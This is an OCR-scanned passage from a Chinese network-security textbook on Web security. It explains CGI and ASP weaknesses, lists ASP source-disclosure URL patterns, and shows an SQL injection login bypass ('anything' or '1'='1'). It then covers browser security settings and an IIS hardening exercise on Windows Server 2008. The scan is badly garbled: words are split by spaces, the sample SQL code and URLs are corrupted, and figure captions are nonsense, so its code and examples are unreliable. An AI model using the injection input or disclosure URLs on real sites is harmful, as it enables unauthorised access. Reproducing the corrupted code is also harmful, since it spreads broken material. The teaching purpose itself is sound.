同时 ,又 将 外 部 程序 的 输出 作为 Web 服务 器 对 发 送信 息 的 Web 浏览 器 的 响应 ,发送 给 用 
户 。CGI 脚 本 使 用 户 能 和 浏览 器 交互 ,使 Web 页 面 从 传统 的 静态 页 面 变 成 了 动态 的 页 面 。 

如 果 CGI 程序 在 设计 的 过 程 中 考虑 不 周 ,而 Web 管理 员 在 将 其 放 到 Web 服务 器 之 前 
并 没有 进行 严格 的 安全 测试 ,CGI 程序 可 能 会 给 黑客 们 以 可 乘 之 机 。CGI 程序 可 能 以 下 面 
两 种 方式 产生 安全 漏洞 。 

(1) CGI 程序 可 能 有 意 或 无 意 地 泄漏 主机 系统 的 一 些 信 息 , 这 些 系统 信息 将 有 助 于 黑 
客 对 系统 进行 攻击 。 

(2) CGI 程序 在 处 理 远程 用 户 输入 时 ,如 一 个 表单 的 内 容 或 者 一 个 可 搜索 的 索引 命令 ， 
容易 受到 远程 用 户 的 攻击 ,用户 可 以 骗取 在 系统 上 执行 命令 的 权限 。 

一 个 被 攻破 的 CGI 程序 仍 有 足够 的 权限 将 系统 中 的 密码 等 重要 信息 以 电子 邮件 的 方 
式 发 送 给 入 侵 者 , 读 取 网 络 信息 映射 数据 库 的 内 容 , 或 在 更 高 的 端口 上 启动 登录 会 话 , 而 要 
完成 这 些 功 能 ,只 需要 在 Perl 程序 中 执行 几 个 简单 的 命令 即 可 。 

2. ASP 的 安全 性 

ASP(active server page', 动 态 服务 器 页 面 ) 是 Microsoft 公司 开发 的 服务 端 脚本 编写 环 
境 ,可 以 创建 和 运行 动态 的 交互 的 Web 服务 器 应 用 程序 。 由 于 ASP 应 用 程序 比 一 般 的 
CGI 程序 更 容易 开发 和 修改 ,因此 ,目前 很 多 基于 Windows 的 服务 器 都 使 用 ASP 作为 交互 
程序 开发 环境 ,通常 是 和 Microsoft 的 IIS Web 服务 器 软件 一 同 使 用 的 。 但 是 ,从 早期 运行 
在 IIS 3.0 上 的 ASP 到 现在 运行 在 IIS 7.0 上 的 ASP, 都 无 一 不 存在 安全 漏洞 。 

1) ASP 源 代 码 的 漏洞 

在 某 些 版 本 的 IS 上 ,如 果 按 照 如 下 的 几 种 URL 格式 输入 ,在 浏览 器 中 就 会 显示 相应 
的 ASP 源 代码 。 

http://www.somehost .com/some.asp::$ DATA 

http://www.somehost .com/some.asp. 
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http://www.somehost.com/some.asps2e 

http://www.somehost.com/somes2es41sp 

http://www.somehost.com/somes2esasp 

http://www.somehost .com/some.asp%$81 (或 者 82) 

http://www.somehost.com/some.aspe9( 或 者 e8) 

上 述 几 种 格式 的 URL 输入 都 可 能 引起 ASP 源 代码 的 安全 漏洞 。 因 为 有 些 源 代码 可 能 
包含 用 户 密码 或 数据 库 等 敏感 信息 ,即使 没有 暴露 这 些 信 息 ,黑客 也 能 借 机 分 析 程 序 逻 辑 中 
的 脆弱 点 ,还 可 以 轻易 地 将 源 程序 取 走 。 

解决 上 述 安全 问题 的 最 好 方法 是 安装 最 新 版 本 的 Service Pack 和 相关 补丁 。 

2) 密码 验证 时 的 漏洞 

有 些 ASP 程序 员 编 写 程序 的 时 候 喜 欢 把 密码 放 在 数据 库 中 ,在 用 户 登录 验证 时 ,采用 
如 下 的 SQL 语句 进行 密码 验证 。 

3ql=" select * from table where username=' " & user id &" "and passwd=-' "&UuUser pxd&"'™" 

此 SQL 语句 是 ASP 程序 if 语句 的 一 部 分 ,如 果 该 语句 返回 真 , 则 用 户 名 和 密码 验证 

若 在 用 户 名 输入 框 中 输入 admin, 在 密码 输入 框 中 输入 letmein, 则 最 后 构造 生成 的 
SQL 查询 语句 为 : 


Select * from table where Username= 'admin' and passwd= 'letmein'" 


如 果 攻 击 者 在 用 户 名 输入 框 中 输入 admin, 在 密码 输入 框 中 输入 anything' or '1' 二 11， 
则 最 后 构造 生成 的 SQL 查询 语句 为 : 


Select * from table where username= 'admin' and passwd= 'anything' or '1'="1" 


由 于 1' = 1 恒 为 真 ,加 上 或 (or) 迎 辑 的 运算 作用 ,该 条 件 恒 为 真 , 用 户 身份 得 到 验证 通 
过 ,可 成 功 进入 后 台 系统 ,系统 安全 被 攻破 。 

解决 的 方法 是 对 用 户 的 输入 进行 合法 性 检查 ,如 先 过 滤 掉 非法 字符 “”, 或 者 逐个 字段 
进行 比较 。 

3) 来 自 filesystemobject 的 威胁 

IIS 4.0 的 ASP 的 文件 操作 可 以 通过 filesystemobject 来 实现 ,包括 文本 文件 的 读 写 , 目 
录 操 作 ,文件 的 复制 改名、 删除 等 ,这 给 编程 人 员 带 来 方便 的 同时 ,也 给 黑客 留 下 了 可 乘 之 
机 。 利 用 filesystemobject 可 以 算 改 并 下 载 FAT 以 及 FAT32 分 区 上 的 任何 文件 ,即使 是 
NTFS 分 区 ,如 果 权 限 没有 设置 好 ,同样 也 能 遭 到 破坏 ,遗憾 的 是 很 多 Web 服务 器 管理 员 只 
知道 让 Web 服务 器 运行 起 来 ,很 少 对 NTFS 分 区 进行 权限 设置 。 

3. SQL 注入 

随 着 B/S 模式 应 用 开发 的 发 展 ,使 用 这 种 模式 编写 应 用 程序 的 程序 员 越 来 越 多 。 但 是 
由 于 这 个 行业 的 入 门 门槛 不 高 ,程序 员 的 水 平 及 经 验 也 参差 不 齐 , 相 当 大 的 一 部 分 程序 员 在 
编写 代码 时 ,没有 对 用 户 输入 的 数据 进行 合法 性 检查 ,导致 应 用 程序 存在 安全 隐患 。 用 户 可 
以 提交 一 段 数 据 库 查询 代码 ,根据 程序 返回 的 结果 ,获得 某 些 想 得 知 的 数据 ,这 就 是 所 谓 的 
SQL Injection, 即 SQL 注入 。 

SQL 注入 攻击 的 危害 性 较 大 ,注入 攻击 成 功 后 ,网 站 后 台 管 理 账 户 名 和 密码 可 被 攻击 

299 





网 络 安全 技术 项 目 化 教程 第 2 版 ) 





者 所 获取 ,之 后 利用 该 账户 登录 后 台 管 理 系统 ,从 而 导致 攻击 者 可 任意 算 改 网 站 数据 或 导致 
数据 的 严重 泄密 。 因 此 ,在 一 定 程度 上 .其 安全 风险 高 于 其 他 漏洞 。 目 前 ,SQL 注入 攻击 已 
成 为 对 网 站 攻击 的 主要 手段 之 一 。 

SQL 注入 是 从 正常 的 WWW 端口 (通常 是 HTTP 的 80 端口 ) 访 问 , 表 面 看 起 来 跟 一 般 
的 Web 页 面 访问 没有 什么 区 别 , 所 以 目前 一 般 的 防火 墙 都 不 会 对 SQL 注入 发 出 警报 或 进 
行 拦 截 。SQL 注入 攻击 具有 一 定 的 隐蔽 性 ,如 果 注 入 攻击 成 功 后 ,攻击 者 并 不 着 急 破坏 或 
修改 网 站 数据 ,管理 员 又 没有 查看 IIS 日 志 的 习惯 , 则 可 能 被 人 侵 很 长 时 间 了 都 不 会 发 觉 。 

据 统 计 , 目 前 国内 的 网 站 使 用 ASP 十 Access 或 SQL Server 的 占 70% 以 上 ,PHP 十 
MySQL 占 20% 左 右 , 其 他 的 不 足 10%。 由 此 可 见 , 使 用 ASP 作为 Web 服务 器 应 用 程序 的 
比例 很 高 ,因此 通常 把 通过 ASP 来 实现 的 SQL 注入 也 称 为 ASP 注入 。 

实现 SQL 注入 的 基本 思路 是 : 首先 判断 环境 ,寻找 注入 点 ,判断 网 站 后 台数 据 库 类 型 ; 
其 次 ,根据 注入 参数 类 型 ,在 脑海 中 重 构 SQL 语句 的 原貌 ,从 而 猜测 数据 库 中 的 表 名 和 列 名 
(字段 名 ) ;最 后 ,在 表 名 和 列 名 猜 解 成 功 后 ,再 使 用 SQL 语句 ,得 出 字段 的 值 。 当 然 , 这 里 可 
能 需要 一 些 运气 的 成 分 。 如 果 能 获得 管理 员 的 账户 名 和 密码 ,就 可 以 实现 对 网 站 的 管理 。 

为 了 提高 注入 效率 ,目前 网 络 上 已 经 有 很 多 ASP 页 面 注入 的 工具 可 以 使 用 。 


10.3.7 Web 浏览 器 的 安全 


在 Internet 上 ,Web 浏览 器 安全 级 别 高 低 的 区 分 是 以 用 户 通过 浏览 器 发 送 数据 和 浏览 
访问 本 地 客户 资源 的 能 力 高 低 来 区 分 的 。 安 全 和 灵活 是 一 对 矛盾 ,高 的 安全 级 别 必然 带 来 
灵活 性 的 下 降 和 功能 的 限制 。 

安全 是 和 对 象 相关 的 。 一 般 可 以 认为 ,小 组 里 十 分 可 信 的 站 点 ,例如 ,办 公 室 的 软件 服 
务 器 的 数据 和 程序 是 比较 安全 的 ;公司 Intranet 站 点 上 的 数据 和 程序 是 中 等 安全 的 ;而 
Internet 上 的 大 多 数 访问 是 相当 不 安全 的 。 

在 下 中 ,定义 了 5 种 浏览 器 访问 安全 级 别 : 高 .中 高 .中 .中 低 、 低 。 同 时 ,提供 了 4 种 
访问 区 域 : Internet\ 本 地 Intranet` 受 信任 的 站 点 和 受 限 制 的 站 点 ,如 图 10-1 所 示 。 根 据 需 
要 ,针对 不 同 的 访问 区 域 ,要 设置 不 同 的 安全 级 别 。 

IE 浏览 器 支持 Cookie、Java、ActiveX 等 网 络 新 技术 ,同时 也 可 以 通过 安全 配置 来 限制 
用 户 使 用 Cookie、 使 用 脚本 (Script) 、 使 用 ActiveX 控件 .下载 数 据 和 程序 等 。 一 般 可 以 从 
以 下 几 个 方面 提高 使 用 浏览 器 的 安全 性 。 

1. Cookie 及 安全 设置 

Cookie 是 Netscape 公司 开发 并 将 其 作为 持续 保存 状态 信息 和 其 他 信息 的 一 种 方式 , 目 
前 大 多 数 的 浏览 器 都 支持 Cookie。Cookie 是 当 用 户 浏览 某 网 站 时 ,网 站 存储 在 用 户 计算 机 
上 的 一 个 小 文本 文件 (1 一 4KB) , 它 记 录 了 用 户 的 ID、 密码 、 浏 览 过 的 网 页 停留 的 时 间 等 信 
息 , 当 用 户 再 次 访问 该 网 站 时 ,网 站 通过 读 取 Cookie, 得 知 用 户 的 相关 信息 ,就 可 以 做 出 相 
应 的 动作 ,如 在 页 面 显示 欢迎 用 户 的 标语 .或 者 让 用 户 不 用 输入 ID、 密 码 就 能 直接 登录 等 。 

Cookie 文件 通常 是 以 user@domain 格式 命名 的 ,user 是 用 户 名 ,domain 是 所 访问 的 网 
站 的 域名 。 

一 般 来 说 ,Cookie 文件 中 的 信息 不 会 对 用 户 的 系统 产生 伤害 。 一 方面 ,Cookie 本 身 不 
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图 10-1 访问 区 域 与 安全 级 别 


是 可 以 运行 的 程序 ,也 不 是 应 用 程序 的 扩展 插件 ,更 不 能 像 病毒 一 样 对 用 户 的 硬盘 和 系统 产 
生 威 胁 ,没有 能 力 直接 与 用 户 的 硬盘 打交道 。Cookie 仅 能 保存 由 服务 器 提供 的 或 用 户 通过 
一 定 的 操作 产生 的 数据 。 另 一 方面 ,Cookie 文件 都 是 很 小 的 (通常 在 255 字 节 以 内 ) ,而 且 
各 种 浏览 器 都 具有 限制 每 次 存储 Cookie 文件 数量 的 能 力 , 因 此 ,Cookie 文件 不 可 能 写 满 整 
个 硬盘 。 

但 是 , 随 着 Internet 的 迅速 发 展 , 网 上 服务 功能 的 进一步 开发 和 完善 ,利用 网 络 传递 的 
资料 信息 越 来 越 重要 ,有 时 涉及 个 人 的 隐私 。 因 此 ,关于 Cookies 的 一 个 值得 关心 的 问题 并 
不 是 Cookies 对 用 户 的 计算 机 能 做 些 什么 ,而 是 能 存储 些 什么 信息 或 传递 什么 信息 到 连接 
的 服务 器 中 。 由 于 一 个 Cookie 是 Web 服务 器 放置 在 用 户 计算 机 中 并 可 以 重新 获取 档案 的 
唯一 标识 符 , 因 此 Web 站 点 管理 员 可 以 利用 Cookies 建立 关于 用 户 及 其 浏览 特征 的 详细 资 
料 。 当 用 户 登 录 到 一 个 Web 站 点 后 ,在 任 一 设置 了 Cookies 的 网 页 上 的 单 击 操作 信息 都 会 
被 加 到 该 档案 中 。 档 案 中 的 这 些 信 息 暂 时 主要 用 于 对 站 点 的 设计 维护 ,但 除 站 点 管理 员外 
并 不 否认 被 其 他 人 窃取 的 可 能 ,假如 这 些 Cookies 持 有 者 们 把 一 个 用 户 身份 链接 到 他 们 的 
Cookies ID, 利 用 这 些 档案 资料 就 可 以 确认 用 户 的 名 字 及 其 地 址 。 因 此 ,现在 许多 人 认为 
Cookie 的 存在 对 个 人 隐私 是 一 种 潜在 的 威胁 。 

为 了 保证 上 网 安全 ,可 对 Cookie 进行 适当 设置 。 在 IE 9.0 中 .打开 “工具 /Internet 选 
项 ”中 的 “隐私 ”选项 卡 , 调 整 Cookie 的 安全 级 别 。 通 常情 况 下 ,可 以 将 滑 块 调整 到 “中 高 ”或 
者 “高 ”的 位 置 ,如 图 10-2 所 示 。 多 数 的 论坛 站 点 需要 使 用 Cookie 信息 ,如 果 用 户 从 来 不 去 
这 些 地 方 ,可 以 将 安全 级 别 调 到 “高 ”来 阻止 所 有 的 Cookie。 如 果 只 是 为 了 禁止 个 别 网 站 的 
Cookie, 可 以 单 击 “ 站 点 ”按钮 ,将 要 屏蔽 的 网 站 添加 到 列表 中 。 
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图 10-2 调整 Cookie 的 安全 级 别 


2. ActiveX 及 安全 设置 

ActiveX 是 Microsoft 公司 提供 的 一 款 高 级 技术 , 它 可 以 像 一 个 应 用 程序 一 样 在 浏览 器 
中 显示 各 种 复杂 的 应 用 。 

ActiveX 是 一 种 应 用 集合 ,包括 ActiveX 控件 、ActiveX 文档 、ActiveX 服务 器 框架 、 
ActiveX 脚本 .HTML 扩展 等 , 它 使 得 在 万 维 网 上 交互 内 容 得 以 实现 。 利 用 ActiveX 技术 ， 
网 上 应 用 变 得 生动 活泼 ,伴随 着 多 媒体 效果 、 交 互 式 对 象 和 复杂 的 应 用 程序 ,使 用 户 犹 如 感 
受 CD 质量 的 音乐 一 般 。 它 的 主要 好 处 是 : 动态 内 容 可 以 吸引 用 户 ,开放 的 、 跨 平台 支持 可 
以 运行 在 Windows、UNIX 等 多 种 操作 系统 上 ,支持 工具 广泛 。 

由 于 ActiveX 的 功能 强大 性 和 开放 性 ,在 使 用 IE 浏览 器 访问 Internet 的 时 候 也 就 经 常 
会 碰 到 ActiveX 的 恶意 攻击 。 由 于 ActiveX 控制 不 含有 任何 类 似 的 严格 安全 性 检查 或 资源 
权限 检查 ,使 用 户 在 使 用 下 浏览 器 浏览 一 些 带 有 恶意 的 ActiveX 控件 时 ,可 以 在 用 户 毫 不 
知情 的 情况 下 执行 Windows 系统 中 的 任何 程序 ,将 用 户 计算 机 上 的 机 密 信 息 发 送 给 
Internet 上 的 某 台 服务 器 ,向 局 域 网 中 传播 病毒 ,甚至 修改 用 户 IE 的 安全 设置 等 。 这 些 都 


会 给 用 户 带 来 很 大 的 安全 风险 。 
在 IE 中 ,可 以 根据 实际 需要 对 ActiveX 的 使 用 进行 限制 ,在 一 定 程度 上 可 以 减少 
ActiveX 所 带 来 的 安全 隐患 。 


在 图 10-1 中 , 单 击 * 自 定义 级 别 ? 按 钮 ,出现 * 安 全 设置 - Internet 区 域 ” 对 话 框 。 移 动 垂 
直 滚 动 条 ,直到 出 现 “ActiveX 控件 和 插件 ”设置 选项 ,如 图 10-3 所 示 。 

这 里 主要 有 5 个 设置 。 

(1) 对 标记 为 可 安全 执行 脚本 的 ActiveX 控件 执行 脚本 。 这 个 设置 是 为 标记 为 安全 执 
行 脚 本 的 ActiveX 控件 执行 脚本 设置 执行 的 策略 。 所 谓 “ 对 标记 为 可 安全 执行 脚本 的 
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10-3 ”ActiveX 安全 设置 


ActiveX 控件 执行 脚本 ”, 就 是 指 具 备 有 效 的 软件 发 行商 证 书 的 软件 。 该 证 书 可 以 说 明 是 谁 
发 行 了 该 控件 而 且 没 有 被 自 改 。 知 道 了 是 谁 发 行 的 控件 ,用 户 就 可 以 决定 是 否 信任 该 发 行 
商 。 如 果 控 件 未 签名 ,那么 用 户 将 无 法 知道 是 谁 创建 的 以 及 能 否 信 任 。 指 定 希 望 以 何 种 方 
式 处 理 具有 潜在 危险 的 操作 ,文件 ,程序 或 下 载 内 容 , 并 选择 下 面 的 某 项 操作 。 

Q@ 如 果 和 希望 在 继续 之 前 给 出 请 求 批 准 的 提示 ,就 选中 “提示 ” 单 选 按 钮 。 

@ 如 果 希 望 不 经 提示 并 自动 拒绝 操作 或 下 载 ,就 选中 * 禁 用 ” 单 选 按钮 。 

@ 如 果 和 希望 不 经 提示 自动 继续 ,就 选中 * 启 用 ” 单 选 按钮 。 

(2) 对 未 标记 为 可 安全 执行 脚本 的 ActiveX 控件 初始 化 并 执行 脚本 。 这 个 设置 是 为 没 
有 标记 为 可 安全 执行 脚本 的 ActiveX 控件 执行 脚本 设置 执行 的 策略 。IE 默认 设置 为 “ 禁 
用 ”, 用 户 最 好 不 要 修改 。 

(3) 下 载 未 签名 的 ActiveX 控件 。 这 个 设置 是 为 未 签名 的 ActiveX 控件 的 下 载 提 供 策 
略 。 未 签名 的 意思 和 没有 标记 为 安全 执行 脚本 的 意思 是 一 样 的 。IE 默认 设置 为 “禁用 ”, 用 
户 最 好 不 要 修改 。 

(4) 下 载 已 签名 的 ActiveX 控件 。 这 个 设置 是 为 已 签名 的 ActiveX 控件 的 下 载 提供 策 
略 。IE 默认 设置 为 “提示 ”, 最 好 不 要 自行 改变 。 

(5) 运行 ActiveX 控件 和 插件 。 这 个 设置 是 为 了 运行 ActiveX 控件 和 插件 的 安全 。 这 
是 最 重要 的 设置 ,但 许多 站 点 都 使 用 ActiveX 作为 脚本 语言 ,所 以 建议 将 其 设置 为 “提示 ”。 
这 样 当 有 ActiveX 运行 时 ,IE 就 会 提醒 用 户 , 用 户 可 以 根据 当时 所 处 的 网 站 ,决定 是 否 使 用 
该 网 站 提供 的 ActiveX 控件 。 例 如 ,访问 Sina、Sohu 等 大 型 网 站 ,用 户 当然 可 以 相信 它 , 从 
而 可 以 放心 地 运行 它 提供 的 ActiveX 控件 。 

3. Java 语言 及 安全 设置 

Java 语言 的 特性 使 它 可 以 最 大 限度 地 利用 网 络 。Applet 是 Java 的 小 应 用 程序 , 它 是 
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动态 、 安 全 、 跨 平台 的 网 络 应 用 程序 。Java Applet 嵌入 HTML 语言 ,通过 主页 发 布 到 
Internet。 当 网 络 用 户 访问 服务 器 的 Applet 时 ,这 些 Applet 在 网 络 上 进行 传输 ,然后 在 支 
持 Java 的 浏览 器 中 运行 。 由 于 Java 语言 的 机 制 ,用 户 一 旦 载 和 人 Applet ,就 可 以 生成 多 媒体 
的 用 户 界面 或 完成 复杂 的 应 用 。Java 语言 可 以 把 静态 的 超 文本 文件 变 成 可 执行 应 用 程序 ， 
极 大 地 增强 了 超 文 本 的 可 交互 操作 性 。 

Java 在 给 和 人们 带 来 好 处 的 同时 ,也 带 来 了 潜在 的 安全 隐患 。 由 于 现在 Internet 和 Java 
在 全 球 应 用 得 越 来 越 普 及 ,因此 人 们 在 浏览 Web 页 面 的 同时 也 会 同时 下 载 大 量 的 Java 
Applet, 这 就 使 得 Web 用 户 的 计算 机 面临 的 安全 威胁 比 以 往 任何 时 候 都 要 大 。 

在 用 户 浏览 网 页 时 ,这 些 黑客 的 Java 攻击 程序 就 已 经 侵入 用 户 的 计算 机 中 去 了 。 所 以 
在 网 络 上 ,不 要 随便 访问 信用 度 不 高 的 站 点 ,以 防止 黑客 的 入 侵 。 

在 IE 中 也 可 以 对 Java 的 使 用 进行 限制 。 在 图 10-3 中 ,移动 垂直 滚动 条 ,直到 看 到 
“Java 小 程序 脚本 ”选项 ,如 图 10-4 所 示 。 根 据 实际 需要 ,可 以 设置 “禁用 ”启用 ?或 “提示 ”。 
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10-4 Java 的 安全 设置 


104 项 目 实施 


10.4.1 任务 1: Web 服务 器 的 安全 配置 


1. 任务 目标 

(1) 掌握 IIS 的 安装 方法 。 

(2) 掌握 IIS 的 安全 设置 方法 。 
2. 任务 内 容 

(1) IIS 的 安装 。 
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(2) 设置 IIS 安全 。 

3. 完成 任务 所 需 的 设备 和 软件 

安装 有 Windows Server 2008 操作 系统 的 服务 器 1 台 。 

4. 任务 实施 步骤 

1) IIS 的 安装 

在 默认 情况 下 , Windows Server 2008 中 并 没有 安装 IIS 角色 ,需要 手动 安装 ,安装 方法 
如 下 。 

步骤 1: 在 Windows Server 2008 服务 器 上 ,选择 “开始 ”管理 工具 ”一 服务 器 管理 
器 "命令 ,打开 “服务 器 管理 器 "窗口 ,选择 左 窗 格 中 的 “角色 ”选项 , 单 击 右 窗 格 中 的 “添加 角 
色 ” 链 接 。 

步骤 2: 在 打开 的 “添加 角色 向 导 ” 对 话 框 中 有 相关 说 明和 注意 事项 , 单 击 “ 下 一 步 ” 按 
钮 ,出 现 “选择 服务 器 角色 ”界面 ,如 图 10-5 所 示 , 选 中 “Web 服务 器 (IIS)" 复 选 框 。 





DL Active Directory Rights Nanagenent Services 
身份 验证 服务 





10-5 “选择 服务 器 角色 ”界面 


步骤 3: 单 击 “ 下 一 步 ” 按 钮 ,出 现 “Web 服务 器 (IIS)” 界 面 ,如 图 10-6 所 示 , 可 以 查看 
Web 服务 器 简介 以 及 安装 时 相关 的 注意 事项 。 

步骤 4: 单 击 * 下 一 步 ?按钮 ,出现 * 选 择 角 色 服 务 界 面 ,默认 只 选择 安装 Web 服务 器 所 
必需 的 角色 服务 ,这 里 选中 Web 服务 器 中 所 有 的 “角色 服务 ”选项 ,如 图 10-7 所 示 。 

步骤 5: 单 击 “下 一 步 ” 按 钮 ,出 现 “ 确 认 安 装 选择 ”界面 ,显示 了 前 面 所 进行 的 设置 ,检查 
设置 是 否 正 确 , 如 图 10-8 所 示 。 
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座 Web 服务 器 (IIS) 





图 10-6 “Web 服务 器 (IIS)” 界 面 
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图 10-7 “选择 角色 服务 "界面 
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固 Yeb 服务 器 (IS) 
@@ 误 腾 Windows 系统 资源 管理 器 (FSHM) 以 及 它 如 何 帮 助 优化 CPU 使 用 情况 的 详细 信 


i 
罕 





图 10-8 “确认 安装 选择 ”界面 


步骤 6: 单 击 “ 安 装 ” 按 钮 开始 安装 Web 服务 器 ,安装 完成 后 ,出 现 “ 安 装 结果 ”界面 ,如 
10-9 所 示 , 单 击 “ 关 闭 ” 按 钮 完成 安装 。 


甫 名 Windows 自动 更 新 。 为 确保 自动 更 新 最 新 安装 的 角色 或 功能 ， 请 启用 “控制 面板 ”; 
VWindows Updateo 





图 10-9 “安装 结果 ”界面 
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2) 设置 IIS 安全 

(1) IP 地 址 限制 。IIS 可 以 允许 或 拒绝 从 特定 IP 地 址 发 来 的 服务 请 求 ,有 选择 地 允许 
特定 主机 可 以 访问 Web 服务 器 ,并 能 够 阻止 除了 特定 IP 地 址 以 外 的 其 他 主机 访问 Web 服 
务 器 。 

步骤 1: 选择 “开始 ”一 “管理 工具 ”一 “Internet 信息 服务 (IIS) 管理 器 ”命令 ,打开 
“Internet 信息 服务 (IIS) 管 理 器 ”窗口 。 

步骤 2: 展开 左 侧 窗 格 中 的 服务 器 (WINSERVER) 和 “网 站 ”节点 ,选中 Default Web 
Site 选项 ,出 现 “Default Web Site 主页 ”界面 .如 图 10-10 所 示 。 
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图 10-10 “Default Web Site 主页 ”界面 


步骤 3: 双击 中 央 窗 格 IIS 区 域 中 的 “IP 地 址 和 域 限 制 * 图 标 ,出 现 “IP 地 址 和 域 限制 ” 
界面 ,如 图 10-11 所 示 。 

步骤 4: 单 击 右 侧 窗 格 中 的 “添加 允许 条 目 ” 链 接 .打开 * 添 加 允许 限制 规则 ”对 话 框 。 

如 果 选 中 “特定 IP 地 址 ” 单 选 按钮 ,并 设置 该 计算 机 的 IP 地 址 ,如 图 10-12 所 示 , 可 允 
许 该 IP 地 址 的 计算 机 访问 。 

如 果 选 中 “IP 地 址 范围 ? 单 选 按钮 ,并 设置 IP 地 址 范围 和 子 网 掩 码 , 如 图 10-13 所 示 ,可 
允许 该 IP 地 址 范围 的 计算 机 访问 。 

步骤 5: 单 击 右 侧 窗 格 中 的 “编辑 功能 设置 "链接 ,打开 “编辑 IP 和 域 限 制 设 置 ? 对 话 框 ， 
在 下 拉 列 表 中 选中 “拒绝 ”选项 ,如 图 10-14 所 示 , 单 击 “ 确 定 ” 按 钮 , 则 除 上 述 指定 的 IP 地 址 
(范围 ) 的 计算 机 能 访问 Web 服务 器 ,其 他 IP 地 址 的 计算 机 都 不 能 访问 。 
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图 10-11 “IP 地 址 和 域 限制 "界面 
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10-12 ”允许 特定 IP 地 址 图 10-13 允许 IP 地 址 范围 


编辑 IF 和 域 限制 设置 


ET | 


BEE S| 
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10-14 “编辑 IP 和 域 限制 设置 "对 话 框 


说 明 在 图 10-11 中 单 击 “ 添 加 拒绝 条 目 ” 链 接 , 并 设置 需 拒 绝 的 IP 地 址 (范围 ) ,然后 
在 图 10-14 中 选中 “允许 ”选项 , 则 除 指定 的 IP 地 址 (范围 ) 的 计算 机 被 拒绝 访问 Web 服务 
器 ,其 他 IP 地址 的 计算 机 都 允许 访问 。 还 可 设置 是 否 启用 域名 限制 。 
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(2) 身份 验证 。 用 IIS 搭建 的 Web 网 站 的 默认 匿名 访问 方式 适用 于 访问 一 般 网 页 ,并 
不 适用 于 一 些 安全 性 要 求 较 高 的 网 站 ,这 时 需要 对 访问 用 户 进行 身份 验证 ,确保 只 有 经 过 授 
权 的 用 户 才 能 实现 对 Web 信息 的 访问 和 浏览 。 

步骤 1: 禁用 匿名 访问 。 在 图 10-10 中 ,双击 中 央 窗 格 IS 区 域 中 的 “身份 验证 "图标, 出 
现 * 身 份 验证 ”界面 ,如 图 10-15 所 示 , 选 中 中 央 窗 格 中 的 “匿名 身份 验证 ?选项 ,再 单 击 右 侧 
窗 格 中 的 “禁用 ”链接 。 
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10-15 “身份 验证 ”界面 


步骤 2: 使 用 Windows 身份 验证 。 从 图 10-15 中 可 以 看 到 ,除了 匿名 身份 验证 方式 外 ， 
还 有 其 他 身份 验证 方式 .这 里 选中 “Windows 身份 验证 ?选项 ,再 单 击 右 侧 窗 格 中 的 “启用 ” 
链接 。 

(3) 端口 限制 。 可 以 通过 端口 访问 各 种 网 络 服务 ,如 FTP 服务 的 默认 端口 是 21, Web 
服务 的 默认 端口 是 80 等 ,因此 可 以 通过 修改 默认 端口 来 提高 网 络 服务 的 安全 性 。 

步骤 1: 在 图 10-10 中 , 单 击 右 侧 窗 格 中 的 “ 绑 定 ”链接 ,打开 “网 站 绑 定 ” 对 话 框 ,如 
图 10-16 所 示 。 





图 10-16 “网 站 绑 定 对话 框 
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步骤 2: 选中 http 选项 ,再 单 击 “ 编 辑 ” 按 钮 ,打开 “编辑 网 站 绑 定 ”对 话 框 ,设置 网 站 IP 
地 址 (如 192. 168. 10. 12) ,把 默认 端口 80 修改 成 其 他 值 (如 8080) ,如 图 10-17 所 示 , 单 击 
“确定 ”按钮 ,返回 “网 站 绑 定 ”对 话 框 , 单 击 “ 关 闭 ” 按 钮 。 





编 加 网 站 绑 定 21x| 


了 ee pw | 





图 10-17 “编辑 网 站 绑 定 ”对 话 框 


步骤 3: 未 修改 默认 TCP 端口 时 ,可 用 http://192. 168. 10. 12 来 访问 网 站 ,修改 了 默 
认 的 TCP 端口 后 , 须 用 http://192. 168. 10. 12:8080 来 访问 网 站 , 即 在 原 网 址 后 面 加 上 修 
改 后 的 端口 号 (中 间 用 冒号 相连 ) ,其 中 192. 168. 10. 12 是 Web 服务 器 的 IP 地 址 。 

(4) 访问 权限 控制 ,步骤 如 下 。 

步骤 1: 在 图 10-10 中 , 单 击 右 侧 窗 格 中 的 “编辑 权限 ”链接 ,打开 “wwwroot 属性 ”对 话 
框 , 如 图 10-18 所 示 。 

步骤 2: 在 “安全 ”选项 卡 中 , 单 击 “编辑 "按钮 ,打开 “wwwroot 的 权限 ?对话 框 ,选中 IIS 
_IUSRS 用 户 组 ,再 设置 该 用 户 组 的 权限 为 允许 * 读 取 和 执行 * 列 出 文件 夹 内 容 ”“ 读 取 ” 等 ， 
如 图 10-19 所 示 , 单 击 * 确 定 ?按钮 返回 到 “wwwroot 属性 ?对 话 框 。 








中 Administrators (WINSEEYER\Adninistrators) 
妃 Users GTNSERYER\Users) 





10-18 “wwwroot 属性 ”对 话 框 10-19 “wwwroot 的 权限 ”对 话 框 


另外 ,还 可 以 利用 NTFS 文件 系统 的 审核 功能 ,确保 账户 的 可 用 性 ,并 在 可 能 出 现 安全 
性 破坏 事件 时 提供 证 据 。 
步骤 3: 单 击 “ 高 级 ”按钮 ,打开 “wwwroot 的 高 级 安全 设置 ?对 话 框 , 如 图 10-20 所 示 。 
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图 10-20 “wwwroot 的 高 级 安全 设置 "对 话 框 


步骤 4: 在 “审核 选项 卡 中 , 单 击 * 编 辑 按 钮 ,在 打开 的 对 话 框 中 单 击 * 添 加 ”按钮 ,打开 
“选择 用 户 或 组 ”对 话 框 ,如 图 10-21 所 示 。 


选择 用 户 或 组 


| 
FE 于 
| 
_ER | WE |] mA | 


图 10-21 “选择 用 户 或 组 ”对 话 框 








步骤 5: 在 “输入 要 选择 的 对 象 名 称 ” 文 本 框 中 输入 Everyone, 然 后 单 击 “ 确 定 ” 按 钮 , 打 
开 “wwwroot 的 审核 项 目 ” 对 话 框 ,如 图 10-22 所 示 。 

步骤 6: 设置 相应 的 审核 项 目 , 如 审核 成 功 “ 更 改 权限 ”, 然 后 单 击 “ 确 定 ” 按 钮 ,此 时 会 在 
“审核 ”选项 卡 的 “审核 项 目 ” 列 表 框 中 显示 审核 项 目 , 最 后 单 击 “确定 ”按钮 ,完成 审核 功能 的 
设置 。 

(5) 更 改 IIS 日 志 的 路 径 , 步 骤 如 下 。 

步骤 1: 在 图 10-10 中 ,双击 中 央 窗 格 IIS 区 域 中 的 “日 志 ” 图 标 ,出 现 “ 日 志 ” 界 面 ,如 
10-23 所 示 。 
3 愉 


项 目 10 Web 安全 








图 .…--。。*t 的 审核 项 目 


.| 


口 加 OOOOOOOOOD 
O0000000000 





